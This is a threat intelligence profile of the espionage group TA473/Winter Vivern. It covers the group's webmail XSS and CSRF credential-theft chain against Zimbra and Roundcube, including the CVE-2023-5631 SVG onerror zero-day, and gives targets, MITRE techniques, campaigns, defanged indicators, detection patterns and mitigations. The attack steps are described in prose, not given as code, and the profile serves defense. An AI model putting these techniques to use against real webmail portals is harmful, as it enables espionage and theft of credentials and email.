TA473 / Winter Vivern | Threat Actor Profile

An espionage group aligned with Russian and Belarusian geopolitical objectives, distinguished by a highly methodical approach to webmail exploitation: use Acunetix to scan public-facing email portals for known unpatched CVEs, then engineer bespoke JavaScript payloads customized to each government target's specific webmail portal — CSRF attacks designed to steal usernames, passwords, and session tokens while appearing to execute on the legitimate server. TA473 does not lead in toolset sophistication but consistently succeeds through persistence and the scale of unpatched internet-facing infrastructure it finds available among NATO-aligned governments. In October 2023, the group escalated to zero-day territory — ESET documented TA473 exploiting CVE-2023-5631, an unpatched XSS in Roundcube's SVG handling — requiring only that a target view a malicious email to compromise their session.

attributed origin Belarus / Russia — state-aligned (assessed)

first observed 2020 (publicly attributed 2021)

primary motivation Intelligence gathering — Ukraine war context

primary targets NATO/EU Government, Military, Diplomatic, Telecom

signature technique Per-target bespoke CSRF JavaScript — webmail XSS

zero-day use CVE-2023-5631 Roundcube (Oct 2023)

recon tool Acunetix vulnerability scanner

linked group MoustachedBouncer (low confidence — ESET)

threat level High

Overview

TA473 / Winter Vivern is a Belarus and Russia-aligned espionage group tracked by Proofpoint since 2021, also identified as UAC-0114 by the Ukrainian CERT and TAG-70 by Google Threat Intelligence. The group has been active since at least 2020 and has focused consistently on government, military, and diplomatic organizations in Europe and Central Asia — particularly those engaged with Russia's war against Ukraine. Proofpoint, SentinelLabs, ESET, the Polish CBZC, and Ukraine CERT have all published research on the group, reflecting its sustained operational profile across multiple threat intelligence organizations.

What distinguishes TA473 from other espionage groups operating against NATO targets is not technical sophistication — Proofpoint has explicitly noted that the group "does not lead the pack in sophistication among APT threats targeting the European cyber landscape." What it demonstrates instead is focus, persistence, and a repeatable process. The group's core workflow — scan internet-facing webmail portals with Acunetix, identify unpatched CVEs, engineer per-target bespoke JavaScript payloads that mimic the native webmail portal's own JavaScript to conduct CSRF attacks — is methodical and effective because it exploits a consistent defensive failure: organizations running public-facing webmail portals that have not been patched.

In October 2023, ESET documented TA473 exploiting CVE-2023-5631 — a zero-day XSS vulnerability in Roundcube's rcube_washtml.php that failed to sanitize malicious SVG documents before rendering them in HTML messages. By sending a crafted email with an SVG tag containing a base64-encoded payload, the group could inject arbitrary JavaScript into a target's webmail session with no manual interaction beyond viewing the message. The group reported the zero-day to Roundcube via ESET — who discovered it on October 12, 2023; Roundcube patched it on October 14. This escalation to zero-day use represented a meaningful increase in TA473's operational capability relative to its prior 1-day/N-day exploitation pattern.

zero-interaction compromise — cve-2023-5631

CVE-2023-5631 required no user interaction beyond viewing an email in a browser-based Roundcube session. An SVG tag with a malicious base64-encoded payload in the onerror attribute injected JavaScript directly into the victim's webmail session. Importantly, this was a zero-day: even fully patched Roundcube instances were vulnerable when ESET discovered the campaign on October 11, 2023. Roundcube patched the issue on October 14. This delivery mechanism — payload delivered via email content rendering, not attachment execution — bypasses traditional email attachment security controls entirely.

Webmail Exploitation Chain

TA473's attack methodology follows a consistent, repeatable process documented across multiple campaigns. The investment in per-target reconnaissance and custom payload engineering is the group's defining operational signature.

Phase 1

Acunetix Reconnaissance — Identify Vulnerable Portals

The group uses Acunetix — a commercial web application vulnerability scanner — to scan internet-facing webmail portals belonging to government and NATO-aligned organizations. The scan identifies which CVEs the portal is vulnerable to, which webmail software is running (Zimbra Collaboration Suite, Roundcube, etc.), and the specific version deployed. This reconnaissance phase determines whether a given target is viable before any phishing activity begins.

Phase 2

Webmail Portal Reverse Engineering — Bespoke JavaScript Development

After identifying a vulnerable portal, TA473 operators study that specific organization's webmail implementation — examining the native JavaScript that runs in the portal, the specific parameter structures, login flow, and session token handling. The group then engineers a custom JavaScript payload specifically designed for that target's portal. Proofpoint noted: "Rather than developing a one-size-fits-all tools and payloads approach, TA473 invests time and resources to compromise specific entities with each JavaScript payload being custom for the targeted webmail portal." The payload closely emulates the portal's own JavaScript to avoid triggering anomaly detection.

Phase 3

Phishing Email Delivery — Exploit URL in Body

Phishing emails are sent from compromised email addresses — frequently originating from unpatched or insecure WordPress-hosted domains. The sender is spoofed to appear as someone from the target organization or a relevant peer organization involved in the Russia-Ukraine diplomatic context. The email body contains what appears to be a benign URL (a legitimate government resource or organizational document), but this URL is hyperlinked to a malicious exploit URL that appends the JavaScript payload as an error parameter to the vulnerable webmail domain.

Phase 4

XSS Exploit Execution — CSRF Credential and Token Theft

When the target clicks the hyperlinked URL, the browser navigates to the attacker-controlled or exploit URL and executes the malicious JavaScript in the context of the target's webmail portal session. The CSRF JavaScript replicates the portal's own authentication behavior, silently capturing the username, password (if the user re-authenticates), and active session CSRF tokens from cookies. These are then exfiltrated to attacker-controlled infrastructure. Stolen credentials and session tokens allow TA473 to log into the victim's webmail account and access their email — or conduct further lateral phishing from a legitimate internal address.

Alt: Zero-Day

Email-Borne XSS — CVE-2023-5631 (No Click Required)

In the October 2023 Roundcube zero-day campaign: a specially crafted email with a malicious SVG tag in the HTML source was sent to targets. Roundcube's rcube_washtml.php script failed to sanitize the SVG before rendering it in the HTML page. The SVG contained an image tag with an invalid href and an onerror attribute containing a base64-encoded JavaScript payload — when the href failed to load, the onerror fired, executing the JavaScript. No user interaction beyond opening the email in a browser-based Roundcube session was required. The second-stage payload (checkupdate.js) was loaded from an attacker-controlled server and exfiltrated email messages to the group's C2.

Target Profile

TA473's targeting is explicitly aligned with intelligence collection priorities relating to the Russia-Ukraine war and NATO's response to Russian foreign policy — making target selection highly predictable relative to geopolitical events.

NATO-aligned European governments: Foreign ministries, defense ministries, and diplomatic missions across NATO member states are documented targets. Poland, Lithuania, Slovakia, Germany, France, and Italy have been identified in public reporting. The common thread is organizations involved in or engaged with Ukraine-related policy, NATO coordination, or European defense planning.
Military and defense entities: Military personnel and defense organizations are targeted for communications relating to weapons supply, troop support, and strategic military coordination with Ukraine. SentinelLabs documented targeting of Polish government agencies and Ukraine's Ministry of Foreign Affairs among others.
Diplomatic missions and embassies: Diplomatic staff — particularly those involved in Russia-Ukraine diplomacy, sanctions coordination, or NATO enlargement discussions — are high-value collection targets. The group has targeted diplomatic personnel in contexts including the Vatican (previously documented as a geopolitically sensitive target given its diplomatic relationships).
US elected officials and staffers: Proofpoint documented TA473 campaigns targeting US elected officials and their staffers from late 2022 and into 2023 — an expansion beyond the primarily European diplomatic focus into US domestic political targets engaged with Ukraine policy, foreign aid, and NATO commitments.
Think tanks and policy research organizations: Organizations conducting research or publishing on European politics, economics, and NATO-Russia relations are targeted as a source of intelligence on policy deliberations before they become official positions.
Telecommunications providers: Through 2024–2025, Brandefense documented TA473 expanding targeting to defense contractors and satellite communication providers — reflecting collection interest in communications infrastructure supporting Ukraine-related operations.
Ukraine and Central Asia: Ukraine itself — government agencies and ministries — remains a core target. The group also operates against Central Asian governments, consistent with Russian intelligence collection priorities across the former Soviet space.

Tactics, Techniques & Procedures

TA473's TTP set is narrow and repeatable — the group's strength is consistency and persistence, not breadth of capability. The webmail XSS exploitation chain is the core of the operation, supplemented by traditional phishing for broader credential collection.

mitre id	technique	description
T1592	Reconnaissance — Acunetix Vulnerability Scanning	TA473 uses Acunetix — a commercial web application vulnerability scanner — to identify unpatched CVEs in internet-facing webmail portals belonging to target organizations. This reconnaissance phase determines vulnerability status before any phishing activity begins, ensuring the group only invests in per-target JavaScript payload engineering when a viable exploit vector exists. The use of a commercial scanner makes reconnaissance activity harder to attribute than custom scanning tools.
T1190	Exploit Public-Facing Application — Webmail XSS	The group exploits reflected and stored XSS vulnerabilities in public-facing Zimbra and Roundcube webmail installations — CVE-2022-27926 (Zimbra reflected XSS), CVE-2020-35730 (Roundcube XSS), CVE-2023-37580 (Zimbra XSS zero-day via Github hotfix), and CVE-2023-5631 (Roundcube SVG parsing zero-day). XSS vulnerabilities in webmail allow arbitrary JavaScript execution within the victim's authenticated browser session — providing access to session cookies, CSRF tokens, and the ability to submit authenticated requests as the victim.
T1185	Browser Session Hijacking — CSRF Token Theft	TA473's bespoke JavaScript payloads conduct cross-site request forgery attacks within the victim's active webmail session. The JavaScript replicates the native portal's authentication flow, captures usernames, passwords, and active CSRF tokens from session cookies, then exfiltrates them to attacker-controlled infrastructure. The stolen CSRF token allows the attacker to submit authenticated requests to the victim's webmail account — reading, downloading, or forwarding email — without requiring the victim's credentials again.
T1566.002	Spearphishing — Link to Exploit URL	Phishing emails contain a hyperlinked URL where the visible text shows a benign government or organizational link, but the underlying href points to an exploit URL. The exploit URL uses the target organization's own webmail domain (which is running a vulnerable Zimbra or Roundcube instance) with an appended JavaScript payload as an error parameter. The URL structure often includes a hash value specific to the targeted individual and an unencoded reference to the target organization — indicating per-recipient URL customization.
T1078	Stolen Credentials — Lateral Phishing	Compromised webmail accounts can be used for lateral phishing — sending malicious emails from the victim's legitimate organizational address to colleagues and contacts. This extends the group's reach into organizations where external phishing would be blocked or suspicious. ESET noted that exploiting access to compromised accounts to conduct lateral phishing attacks is documented in TA473's operational playbook.
T1059.001	PowerShell Backdoor — Non-Webmail Campaigns	Beyond the webmail exploitation chain, TA473 has deployed a custom PowerShell backdoor in some campaigns — documented by SentinelLabs and the State Cyber Protection Centre of Ukraine. The PowerShell backdoor provides persistent access to endpoint systems beyond the webmail session access that CSRF exploitation provides. Phishing documents delivering PowerShell payloads are used in campaigns targeting organizations or individuals not running vulnerable webmail portals.
T1027	Base64 Encoding — JavaScript Obfuscation	TA473 employs multiple layers of Base64 encoding in its JavaScript payloads — both in the CVE-2023-5631 SVG exploit (where the payload is base64-encoded in the SVG's onerror attribute) and in earlier Zimbra CSRF payloads. Proofpoint noted that "the attackers employed several layers of Base64 encoding for JavaScript obfuscation, however, the experts pointed out that decoding the script is trivial." The obfuscation is primarily intended to bypass simple signature-based detection, not to resist analysis.
T1598	Phishing for Information — Credential Harvesting Pages	Alongside webmail exploitation, TA473 operates credential harvesting campaigns using phishing websites that replicate government portal login pages. These campaigns target credentials for organizations whose webmail portals are not vulnerable to the group's known CVE inventory — providing a broader collection capability beyond the XSS exploitation chain.

Known Campaigns

Selected operations across TA473's documented history, illustrating the consistent webmail exploitation methodology and its progressive escalation from N-day exploitation to zero-day use.

Early Operations — European Government Phishing 2020–2022

TA473's earliest documented campaigns, first identified by DomainTools in 2021, focused on government entities in Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine, and the Vatican using malicious documents and phishing websites delivering PowerShell payloads. The group used the Follina exploit (CVE-2022-30190) opportunistically when disclosed in May 2022 — indicating an established practice of adopting publicly disclosed vulnerabilities rapidly. These early campaigns established the group's consistent focus on European diplomatic and government targets before the more specialized webmail exploitation methodology became the primary approach.

Zimbra CVE-2022-27926 — NATO Webmail Access Feb–Mar 2023

Proofpoint documented TA473 continuously exploiting CVE-2022-27926 — a reflected XSS vulnerability in Zimbra Collaboration Suite 9.0.0 — against government entities in Europe from at least February 2023. The group used Acunetix to identify government portals running vulnerable Zimbra installations, then delivered phishing emails with malicious URLs appending Base64-encoded JavaScript snippets to the Zimbra error parameter. Custom CSRF JavaScript payloads were engineered for each target's specific portal configuration, capturing usernames, passwords, and CSRF tokens. Targets documented or assessed in public reporting included NATO military and diplomatic personnel across multiple European countries, US elected officials and staffers, and policy experts in European politics and economics. The goal was assessed as accessing emails related to the Russia-Ukraine war from government officials across Europe.

Zimbra CVE-2023-37580 — Zero-Day from Github Hotfix Jun–Aug 2023

Google TAG discovered Winter Vivern (UNC4907) exploiting CVE-2023-37580 — a reflected XSS zero-day in Zimbra — in June 2023, before the official patch was released. Notably, the group began exploiting the vulnerability after Zimbra pushed a hotfix to their public GitHub repository on July 5, 2023 but before the official advisory was published — meaning TA473 discovered the vulnerability by monitoring Zimbra's GitHub commits. The campaign targeted European government organizations. TAG documented that multiple groups exploited this same vulnerability, with Winter Vivern's campaign deploying malware from applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js.

Roundcube CVE-2020-35730 — European Governments Aug–Sep 2023

ESET documented TA473 exploiting CVE-2020-35730 — a known XSS vulnerability in Roundcube — in August and September 2023 against European governmental entities. This campaign demonstrated the group's parallel capability against Roundcube webmail in addition to Zimbra, and its willingness to exploit older known vulnerabilities against organizations that had not applied patches issued years earlier.

Roundcube Zero-Day CVE-2023-5631 — European Governments and Think Tank Oct 2023

TA473's most significant documented capability escalation. ESET discovered the group exploiting CVE-2023-5631 — an unpatched XSS zero-day in Roundcube's rcube_washtml.php SVG sanitization — on October 11, 2023. Malicious emails sent from team.managment@outlook[.]com with the subject "Get started in your Outlook" contained an SVG tag in the HTML source with a base64-encoded payload in an onerror attribute. Opening the email in a Roundcube webmail session was sufficient to execute the payload — no click, no attachment interaction required. The payload loaded a second-stage JavaScript (checkupdate.js) from an attacker-controlled server, which exfiltrated email messages to the group's C2. ESET reported the zero-day on October 12; Roundcube patched it on October 14. Targets included governmental entities and a think tank, all in Europe.

2024–2025 Evolved Operations 2024–2025

Brandefense documented continued TA473 evolution through 2024–2025: multi-layer staging servers used to conceal operator activity, more extensive use of cloud-based email evasion and HTML smuggling, targeted attacks against defense contractors and satellite communication providers, integration of MFA bypass phishing components, and increased anti-analysis features in web shells and loaders. The group began using AI-assisted content generation to create more authentic multilingual phishing lures — improving the quality and language accuracy of social engineering content directed at targets across multiple European language groups.

Tools & Malware

TA473's toolkit is limited compared to more sophisticated state-sponsored groups — reflecting a capability model built around process and persistence rather than proprietary tooling investment.

Acunetix (commercial): A commercial web application vulnerability scanner used by TA473 to identify unpatched CVEs in internet-facing webmail portals. The use of a legitimate commercial tool makes scanning traffic harder to attribute — Acunetix scans appear similar to legitimate security testing activity in network logs.
Per-target CSRF JavaScript payloads: Custom JavaScript blocks engineered specifically for each target organization's webmail portal. The scripts replicate the portal's native JavaScript structure, conduct cross-site request forgery to capture authentication credentials and session tokens, and exfiltrate them to attacker-controlled infrastructure. Proofpoint identified multiple distinct JavaScript variants tailored to different Zimbra and Roundcube portal configurations. Base64 encoding is used for simple obfuscation.
CVE-2023-5631 SVG-based payload (checkupdate.js): A two-stage exploit chain specific to the October 2023 Roundcube zero-day campaign. Stage 1: a malicious SVG tag embedded in the email HTML containing a base64-encoded payload in an onerror attribute. Stage 2: the onerror fires and fetches checkupdate.js — a JavaScript loader — from an attacker-controlled server. The loader executes within the Roundcube session and exfiltrates email messages to the C2.
Custom PowerShell backdoor: Documented in earlier campaigns by SentinelLabs and CERT-UA. Provides persistent endpoint access beyond webmail session access — used in campaigns against organizations not running vulnerable webmail portals or where endpoint persistence is required beyond credential collection.
Compromised WordPress infrastructure: TA473 sends phishing emails from compromised addresses originating from unpatched or insecure WordPress-hosted domains — leveraging the reputation of legitimate-looking website domains for email sending. The compromise of WordPress sites for C2 relay and phishing infrastructure is a consistent documented pattern.
Malicious documents (historical): Early campaigns delivered malicious documents exploiting Follina (CVE-2022-30190) and other Office vulnerabilities. This delivery vector became secondary as the webmail exploitation approach proved more reliable against the group's diplomatic target set.

Indicators of Compromise

TA473's most distinctive detection opportunities are the per-target URL structure of Zimbra exploit URLs and the Roundcube SVG payload pattern. Network-level detections for CSRF exfiltration are more complex given the legitimate-appearing traffic.

detection note — xss traffic mimics legitimate portal requests

TA473's CSRF JavaScript payloads are specifically engineered to replicate the legitimate webmail portal's own request patterns — making network-level detection difficult because malicious and legitimate traffic appear similar. Host-based detection in the webmail server's application logs, and email content scanning for SVG tags with onerror attributes containing base64 payloads, are more reliable detection paths than network traffic analysis alone.

indicators of compromise — url patterns and email content

url pattern Zimbra exploit URL: [target webmail domain]/[error parameter][Base64 or hex-encoded JavaScript snippet]

url structure Structured URI: hash of targeted individual + unencoded target org reference + encoded benign URL (Zimbra CVE-2022-27926 pattern)

email content SVG tag in HTML email with onerror attribute containing base64-encoded payload — CVE-2023-5631 delivery signature

email content Mismatch between displayed URL text (benign government resource) and actual hyperlink target (exploit URL)

c2 domain applicationdevsoc[.]com — CVE-2023-37580 Zimbra campaign (Winter Vivern, attributed by Google TAG)

sender team.managment@outlook[.]com — CVE-2023-5631 Roundcube zero-day campaign (ESET)

infrastructure Compromised WordPress-hosted domains used as phishing email senders — unpatched CMS used for sending infrastructure

suricata rules ET TROJAN Wintervivern Activity M4 (2034116) / M5 (2034117) / Retrieving Commands (2034115) — published by Proofpoint

Mitigation & Defense

TA473's success depends on a single systematic defensive failure: unpatched public-facing webmail infrastructure. Patch management for internet-accessible webmail portals is the most impactful single control against this group.

Patch Zimbra and Roundcube immediately and continuously: The group's entire primary attack chain depends on unpatched webmail portals. CVE-2022-27926 was patched in Zimbra 9.0.0 Patch 24 — over a year before TA473's documented exploitation. CVE-2023-5631 was patched by Roundcube within 48 hours of ESET's report. Organizations running current Zimbra and Roundcube versions would have been immune to the documented CVE-based attack chains. Establish a dedicated patch cycle for all internet-facing applications — particularly webmail — separate from internal system patching, with critical security patches applied within 24–72 hours of release.
Monitor the GitHub hotfix gap: TA473 exploited CVE-2023-37580 by detecting Zimbra's GitHub hotfix before the official advisory. Subscribe to GitHub release monitoring for all deployed internet-facing software. Treat a hotfix or security commit appearance in a vendor's public repository as equivalent to a published CVE — apply immediately without waiting for official release notes.
Restrict internet access to webmail portals where feasible: Proofpoint and CSO Online both explicitly recommend restricting public internet access to webmail portals for organizations in TA473's target category. VPN-gated webmail access eliminates the external attack surface that Acunetix scanning identifies. Where fully restricting public access is not operationally feasible, geo-blocking access from geographic regions with no legitimate user base reduces attack surface.
Block SVG tag rendering in webmail HTML: The CVE-2023-5631 exploit relied on Roundcube rendering an SVG tag with an onerror attribute from email HTML content. Configure webmail content security policies (CSP) to block SVG rendering from email content. Many enterprise email gateway configurations already strip or neutralize SVG content — verify that your Roundcube deployment applies content sanitization before rendering.
Email content scanning for exploit URL patterns: TA473's phishing emails contain a distinctive structure: visible benign URL text hyperlinked to a different underlying URL that targets the organization's own webmail domain with appended JavaScript parameters. Deploy email gateway rules that flag messages where the visible link text and the underlying href target differ, particularly where the href includes the target organization's own domain with query string parameters.
Multi-factor authentication on all webmail: Even if CSRF JavaScript successfully captures a username, password, and session CSRF token, MFA-enforced webmail accounts cannot be accessed from attacker-controlled infrastructure using stolen credentials alone. MFA does not prevent the CSRF attack from executing within the victim's own browser session, but it prevents the stolen credentials from being used by the attacker to independently log in from their own infrastructure. This significantly limits the value of stolen credentials while not preventing all impact.
Application-layer logging for webmail request anomalies: TA473's CSRF payloads submit authenticated requests that mimic legitimate portal behavior — making network-level detection difficult. Implement webmail application-layer logging that captures unusual request patterns: authentication attempts from unexpected source IPs using fresh CSRF tokens, bulk email downloads within a session, or multiple mail export requests in a short window. Alert on sessions where the CSRF token changes or where post-authentication activity volume spikes abnormally.

analyst note

ESET's observation — "a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities" — is the precise policy gap that TA473 exploits as a deliberate operational strategy. Proofpoint's characterization of the group as demonstrating "focus, persistence, and a repeatable process for compromising geopolitically exposed targets" is an accurate model: this is not a group that will innovate past strong patch management. The October 2023 zero-day use (CVE-2023-5631) was a notable escalation — the group had previously relied exclusively on known CVEs with public PoCs — but even that zero-day was patched within 48 hours and was exploited for only a brief window. ESET's low-confidence assessment that Winter Vivern is linked to MoustachedBouncer (a Belarus-aligned group) provides an interesting infrastructure connection to track. The group's 2024–2025 adoption of AI-assisted phishing lure generation and MFA bypass components reflects a pattern seen across Eastern European espionage actors: continued investment in capabilities that address the most common defensive improvements adopted by targets.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile